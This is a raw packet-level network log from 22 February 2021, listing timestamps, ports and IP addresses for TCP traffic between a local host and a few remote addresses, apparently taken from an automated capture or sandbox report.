Feb 22, 2021 20:35:27.262367964 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.262420893 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.262784958 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.262845993 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.262859106 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.262903929 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.262912035 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.262969017 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.263030052 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.263082981 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.263123989 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.263128996 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.263670921 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.263734102 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.263784885 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.263835907 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.263876915 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.263884068 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.263885975 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.263998032 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.264605999 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.264678001 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.264708996 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.264729023 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.264780045 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.264836073 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.264867067 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.264888048 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.264993906 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.265006065 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.265356064 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.265441895 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.265496016 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.265552044 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.265604019 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.265652895 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.265702963 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.265743971 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.265754938 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.265759945 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.266307116 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.266360044 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.266408920 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.266458988 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.266515970 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.266566992 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.266613960 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.266616106 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.266623020 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.266625881 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.266839981 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.267254114 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.267304897 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.267354965 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.267402887 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.267446041 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.267457008 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.267796993 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.267848015 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.267906904 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.267995119 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.268145084 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.268194914 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.268244982 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.268290043 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.268302917 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.268306017 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.268793106 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.268846035 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.268991947 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269027948 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269129038 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269175053 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.269184113 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.269186974 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.269210100 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269246101 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269696951 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269737959 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269776106 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269809008 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.269821882 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.269831896 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.270160913 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.282146931 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.282171965 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.282188892 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.282206059 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.282277107 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.282294989 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.282960892 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.282980919 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.282994032 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.283030033 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.285166025 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.285271883 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.285315990 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.285319090 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.285356998 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.285533905 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.285547972 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.285588026 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.285626888 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.285639048 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.285685062 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.285789013 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.292960882 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.292988062 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.293013096 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.293044090 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.293065071 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.293091059 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.293107033 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.293180943 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.296210051 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296232939 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296253920 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296277046 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296305895 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296329021 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296350002 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.296353102 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296356916 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.296377897 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296417952 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.296422958 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.296612978 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296639919 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296667099 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296686888 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.296690941 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.296744108 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.302618027 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.302645922 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.302710056 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.302736044 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.302759886 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.302792072 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.302802086 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.302809954 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.302822113 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.302839994 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.302850962 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.302962065 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.303005934 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.304224968 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.304265976 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.304286957 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.304311037 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.304335117 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.304357052 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.304380894 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.304430962 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.304444075 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.304446936 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.305838108 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.305869102 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.305891037 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.305916071 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.305938005 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.305960894 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.305979013 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.305984974 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.305986881 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.306010962 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306026936 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306058884 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.306063890 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.306530952 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306559086 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306582928 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306607008 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306628942 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306653023 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306675911 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306678057 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.306684971 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.306688070 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.306701899 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306727886 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.306751013 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308329105 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308356047 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308379889 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308403015 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308408022 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.308415890 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.308418036 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.308425903 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308449030 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308474064 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308497906 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308512926 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.308517933 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.308521032 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.308521986 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308546066 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.308825970 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309180021 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309206963 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309231997 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309256077 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309279919 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309281111 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309287071 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309307098 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309331894 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309355974 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309381008 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309421062 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309429884 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309434891 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309437990 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309802055 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309829950 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309854031 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309875965 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309899092 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309925079 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309927940 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309933901 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309951067 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.309989929 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.309998035 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:33.281028986 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:33.281415939 CET	49747	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:46.092705965 CET	49751	80	192.168.2.4	54.225.220.115
Feb 22, 2021 20:35:46.220046997 CET	80	49751	54.225.220.115	192.168.2.4
Feb 22, 2021 20:35:46.220136881 CET	49751	80	192.168.2.4	54.225.220.115
Feb 22, 2021 20:35:46.221090078 CET	49751	80	192.168.2.4	54.225.220.115
Feb 22, 2021 20:35:46.348480940 CET	80	49751	54.225.220.115	192.168.2.4
Feb 22, 2021 20:35:46.361371994 CET	80	49751	54.225.220.115	192.168.2.4
Feb 22, 2021 20:35:46.415369987 CET	49751	80	192.168.2.4	54.225.220.115
Feb 22, 2021 20:35:57.035093069 CET	49754	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:57.086560011 CET	80	49754	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:57.086675882 CET	49754	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:57.087357998 CET	49754	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:57.138688087 CET	80	49754	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:57.143479109 CET	80	49754	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:57.197489023 CET	49754	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:57.208777905 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.254503965 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.254645109 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.365592003 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.409081936 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.410059929 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.410095930 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.410118103 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.410211086 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.415369987 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.460166931 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.527329922 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.573767900 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573805094 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573828936 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573848009 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573869944 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573890924 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573910952 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573930979 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573952913 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573977947 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.573976994 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.574012995 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.574023008 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.578722954 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.578761101 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.578835964 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.583528996 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.583568096 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.583704948 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.588355064 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.588397026 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.588468075 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.593090057 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.593158960 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.593274117 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.597920895 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.597963095 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.598037004 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.602695942 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.602735043 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.602806091 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.607476950 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.607518911 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.607635021 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.612199068 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.612229109 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.612344980 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.617139101 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.617172003 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.617265940 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.621892929 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.621932983 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.622066975 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.624763966 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.624798059 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.624878883 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.627265930 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.627302885 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.627329111 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.627353907 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.627370119 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.627405882 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.629447937 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.629484892 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.629575968 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.631688118 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.631722927 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.631804943 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.633948088 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.633980989 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.634044886 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.635993004 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.636023045 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.636081934 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.638070107 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.638111115 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.638241053 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.639946938 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.639981985 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.640048981 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.641843081 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.641875029 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.641966105 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.643748999 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.643781900 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.643888950 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.645512104 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.645548105 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.645665884 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.647190094 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.647226095 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.647313118 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.649091005 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.649127007 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.649245977 CET	49755	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:57.650685072 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.650717020 CET	443	49755	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:57.650743961 CET	443	49755	185.199.108.133	192.168.2.4
